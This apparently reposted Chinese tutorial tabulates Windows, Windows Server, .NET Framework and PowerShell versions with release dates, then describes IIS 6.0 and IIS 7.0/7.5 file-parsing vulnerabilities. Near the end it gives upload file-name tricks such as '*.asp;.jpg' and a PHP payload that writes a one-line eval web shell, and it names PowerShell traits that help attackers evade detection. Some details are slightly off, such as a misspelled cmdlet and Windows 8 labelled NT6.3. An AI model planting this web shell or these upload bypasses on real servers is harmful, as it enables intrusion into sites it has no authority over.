Windows各版本以及漏洞
目錄
MS-Dos
Win?9X
Win?NT
Windows Server
.NET FrameWork
PowerShell
IIS6.0漏洞
? ? 解析漏洞
IIS7.0/7.5漏洞
? ? 畸形解析漏洞
MS-Dos
| Windows1.0 | 1985.11 |
| Windows2.0 | 1987.12 |
| Windows2.1 | 1988 |
| Windows3.0 | 1990.5 |
| Windows3.1 | 1992 |
| Windows3.2 | 1994 |
Win?9X
| Windows95 | 1995.8(擁有開(kāi)始按鈕和菜單欄) |
| Windows98 | 1998.6(真正意義上的圖形化界面系統(tǒng)) |
| Windows98SE | 1999 |
| WindowsME | 2000.9 |
Win?NT
| WindowsNT3.1 | 1993 |
| WindowsNT4.0 | 1996.4 |
| Windows 2000 (NT5.0) | 2000 |
| Windows XP (NT5.1) | 2001.10? ? 2009.4停止更新 |
| Window Vista (NT6.0) | 2005.11 |
| Windows 7 (NT6.1) | 2009 |
| Windows 8 (NT6.3) | 2012.10 |
| Windows 8.1 | 2013.10 |
| Windows 10 (NT10.0) | 2015.7 |
Windows Server
| Windows Server 2003 | 2003.3? ? ? ? ?2015.7停止更新 | IIS6.0 |
| Windows Server 2008 | 2008.2 | IIS7.0/IIS7.5 |
| Windows Server 2012 | 2012.9 | IIS8.0 |
| Windows Server 2016 | 2016.10 | IIS10 |
?
.NET FrameWork
.NET FrameWork是微軟的新一代技術(shù)平臺(tái),為敏捷商務(wù)構(gòu)建互聯(lián)互通的應(yīng)用系統(tǒng),這些系統(tǒng)是基于標(biāo)準(zhǔn)的,聯(lián)通的,適應(yīng)變化的,穩(wěn)定的和高性能的。從技術(shù)的角度,一個(gè).NET應(yīng)用是一個(gè)運(yùn)行于.NET?Framework之上的應(yīng)用程序。(更精確的說(shuō),一個(gè).NET應(yīng)用是一個(gè)使用.NET Framework類庫(kù)來(lái)編寫,并運(yùn)行于公共語(yǔ)言運(yùn)行時(shí)Common Language Runtime之上的應(yīng)用程序。)如果一個(gè)應(yīng)用程序跟.NET Framework無(wú)關(guān),它就不能叫做.NET程序。比如,僅僅使用了XML并不就是.NET應(yīng)用,僅僅使用SOAP SDK調(diào)用一個(gè)Web Service也不是.NET應(yīng)用。.NET是基于Windows運(yùn)行的操作平臺(tái),應(yīng)用于互聯(lián)網(wǎng)的分布式。
.NET平臺(tái)類似Java平臺(tái),是微軟于2000年推出的Windows操作系統(tǒng)的應(yīng)用軟件開(kāi)發(fā)框架,發(fā)展至今形成巨大的技術(shù)棧,涉及多語(yǔ)言(支持C#、F#、VB.NET)多領(lǐng)域(Windows桌面軟件、Web應(yīng)用、移動(dòng)開(kāi)發(fā)等)軟件開(kāi)發(fā),隨著2014年,微軟宣布.NET開(kāi)源,支持Linux等平臺(tái),和Java平臺(tái)一樣實(shí)現(xiàn)了跨平臺(tái)。
| .Net Framework1.0 | 2002-02-13 | Visual?Studio 2002 | Windows XP? |
| .Net Framework1.1 | 2003-04-24 | Visual Studio 2003 | Windows Server 2003 |
| .Net Framework2.0 | 2005-11-07 | Visual Studio 2005 | ? |
| .Net Framework3.0 | 2006-11-06 | ? | Windows Vista,Windows Server 2008 |
| .Net Framework3.5 | 2007-11-19 | Visual Studio 2008 | Windows 7,Windows Server 2008 R2 |
| .Net Framework4.0 | 2010-04-12 | Visual Studio 2010 | Windows 7,Windows Server 2008 R2 |
| .Net Framework4.5 | 2011-09-20 | Visual Studio 2012 | Windows 8/8.1 |
| .Net Framework4.6 | 2015-07-21 | Visual Studio 2015 | Windows 10 |
| .Net Framework4.7 | 2017-10-18 | Visual Studio 2017 | Windows 10 |
PowerShell
Windows Powershell是一種命令行外殼程序和腳本環(huán)境,它從Windows7開(kāi)始,就已經(jīng)內(nèi)置在了Windows中,PowerShell使命令行用戶和腳本編寫者可以利用 .NET FrameWork的強(qiáng)大功能。一旦攻擊者可以在一臺(tái)計(jì)算機(jī)上運(yùn)行代碼,他們就會(huì)下載PowerShell腳本文件(.ps1)到磁盤中執(zhí)行,甚至無(wú)須寫到磁盤中執(zhí)行,它可以直接在內(nèi)存中執(zhí)行,也可以把PowerShell看成是命令行提示符cmd.exe的擴(kuò)充。
PowerShell需要.NET環(huán)境的支持,同時(shí)支持.NET對(duì)象,其可讀性、易用性,可以位居當(dāng)前所有Shell之首。PowerShell的這些特點(diǎn)正則吸引攻擊者,使他逐漸成為一個(gè)非常流行的攻擊工具。
一個(gè)PowerShell腳本其實(shí)就是一系列PowerShell命令的集合,PowerShell腳本的后綴名為 .PS1
PowerShell的執(zhí)行策略:
為了防止惡意腳本的執(zhí)行,PowerShell有一個(gè)執(zhí)行策略,默認(rèn)情況下,這個(gè)執(zhí)行策略被設(shè)置為受限
在PowerShell腳本無(wú)法執(zhí)行時(shí),可以使用下面的cmdlet命令確定當(dāng)前的執(zhí)行策略
- Get-ExectionPolicy
- Restricted :腳本不能執(zhí)行(默認(rèn)設(shè)置)
- RemoteSigned:本地創(chuàng)建的腳本可以執(zhí)行,但從網(wǎng)上下載的腳本不能運(yùn)行(擁有數(shù)字證書(shū)簽名的除外)
- AllSigned:僅當(dāng)腳本由受信任的發(fā)布者簽名時(shí)才能運(yùn)行
- Unrestricted:允許所有的腳本運(yùn)行
PowerShell具有以下優(yōu)點(diǎn):
- Windows7以上系統(tǒng)默認(rèn)安裝
- PowerShell腳本可以運(yùn)行在內(nèi)存中,不需要寫入磁盤
- 可以從另一個(gè)系統(tǒng)中下載PowerShell腳本并執(zhí)行
- 很多安全軟件并不能檢測(cè)到PowerShell的活動(dòng)
- cmd.exe通常會(huì)被阻止運(yùn)行,但是PowerShell不會(huì)
- 可以用來(lái)管理活動(dòng)目錄
| 操作系統(tǒng) | PowerShell版本 |
| Win7 / Win Server 2008 | 2.0 |
| Win8 / Win Server 2012 | 3.0 |
| Win8.1 / Win Server 2012R2 | 4.0 |
| Win10 / Win Server 2016 | 5.0 |
IIS6.0漏洞
? ? 解析漏洞
1、在網(wǎng)站目錄中如果存在名為*.asp、*.asa、*.cer、*.cdx的目錄,那該目錄內(nèi)的任何文件都會(huì)被IIS解析為asp文件并執(zhí)行。
2、在上傳圖片木馬的時(shí)候,將文件名改為件文件都*.asp;.jpg、*.asa;.jpg、*.cer;.jpg ,該文件被IIS解析為asp文件并執(zhí)行。
注:IIS6.0對(duì)域后綴是asp、asa、cer的文件都當(dāng)成是asp文件執(zhí)行,對(duì)于cdx后綴的文件動(dòng)作是下載
IIS7.0/7.5漏洞
? ? 畸形解析漏洞
在IIS7.0、IIS7.5中,在默認(rèn)Fast-CGI開(kāi)啟狀況下,新建一個(gè)1.txt文件,內(nèi)容為<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST['xie'])?>')?>,將文件保存成1.jpg格式,上傳到服務(wù)器,假設(shè)上傳路徑為/upload,上傳成功后,直接訪問(wèn)/upload/1.jpg,此時(shí)神奇的畸形解析開(kāi)始發(fā)揮作用啦,我們會(huì)神奇的發(fā)現(xiàn)/upload目錄下創(chuàng)建了一個(gè)一句話木馬文件shell.php。
臨時(shí)解決辦法:關(guān)閉cgi.fix_pathinfo為0
?
總結(jié)
以上是生活随笔為你收集整理的Windows各版本以及漏洞的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: Windows域的管理
- 下一篇: IIS7.5配置对PHP的支持